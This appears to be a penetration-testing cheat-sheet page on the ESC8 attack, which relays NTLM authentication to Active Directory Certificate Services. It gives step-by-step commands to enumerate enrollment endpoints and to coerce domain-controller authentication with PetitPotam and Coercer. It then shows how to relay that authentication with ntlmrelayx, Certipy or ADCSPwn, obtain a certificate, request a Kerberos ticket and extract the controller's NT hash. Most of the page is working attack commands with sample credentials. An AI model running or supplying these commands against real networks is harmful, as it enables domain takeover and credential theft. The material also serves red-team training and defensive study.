# ESC8

* <https://blog.truesec.com/2021/08/05/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory/>
* <https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/>
* <https://habr.com/ru/company/deiteriylab/blog/581758/>
* <https://habr.com/ru/companies/jetinfosystems/articles/846066/>

## Enumerate

Discover CES endpoints with certutil:

```
Cmd > certutil.exe -enrollmentServerURL -config CA01.megacorp.local\CA01
```

Discover CES endpoints with PowerShell:

```
PS > Get-CertificationAuthority | select name,enroll* | fl
```

Check a bunch of targets for the vulnerable endpoint:

```
$ for ip in `cat ~/ws/discover/hosts/ca.txt`; do curl -sSLkI -u 'MEGACORP\snovvcrash:Passw0rd!' --ntlm http://$ip/certsrv/certfnsh.asp | grep -e 401 -e 200 > /dev/null && echo "[+] $ip" || echo "[-] $ip"; done
```

## Exploit

### ntlmrelayx

* <https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/>
* <https://github.com/fortra/impacket/pull/1101>
* <https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack>

```
$ ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --adcs [--template VulnTemplate] --no-http-server --no-wcf-server --no-raw-server
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
PS > .\Rubeus.exe asktgt /user:DC1$ /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt
```

### PKINITtools

* <https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/>
* <https://github.com/dirkjanm/PKINITtools>
* <https://gist.github.com/snovvcrash/8b6a1a10e1f47439d16072c60cc2e099>

Backup original `httpattack.py` and copy one from the toolkit with a modified domain name and a template if needed (`DomainController` is by default, but also one may use `KerberosAuthentication`):

```
$ sudo cp /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py.bak
$ subl ntlmrelayx/httpattack.py
$ sudo cp ntlmrelayx/httpattack.py /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py
```

Perform the relay attack, request the TGT via PKINIT and get the NT hash based on U2U Kerberos extension:

```
$ ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp -smb2support --no-http-server --no-wcf-server --no-raw-server
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
$ python3 gettgtpkinit.py megacorp.local/'DC1$' -cert-pem cert.pem -key-pem privatekey.pem dc1.ccache
$ KRB5CCNAME=dc1.ccache python3 getnthash.py megacorp.local/'DC1$' -key 00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
```

Revert the original `httpattack.py`:

```
$ sudo mv /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py.bak /usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py
```

### Certipy

Prepare for the relay attack:

```
$ certipy relay -ca 192.168.1.12 -template DomainController
```

### ADCSPwn

* <https://github.com/bats3c/ADCSPwn>

{% embed url="<https://youtu.be/W9pUCVxe59Q>" %}

Start a relay server:

```
PS > .\ADCSPwn.exe --adcs CA01.megacorp.local
```

Coerce the authentication, e. g. via [Coercer](https://github.com/p0dalirius/Coercer):

```
$ coercer coerce -u snovvcrash -p 'Passw0rd!' -t 192.168.1.11 -l VICTIM01 --auth-type http --http-port 8080
```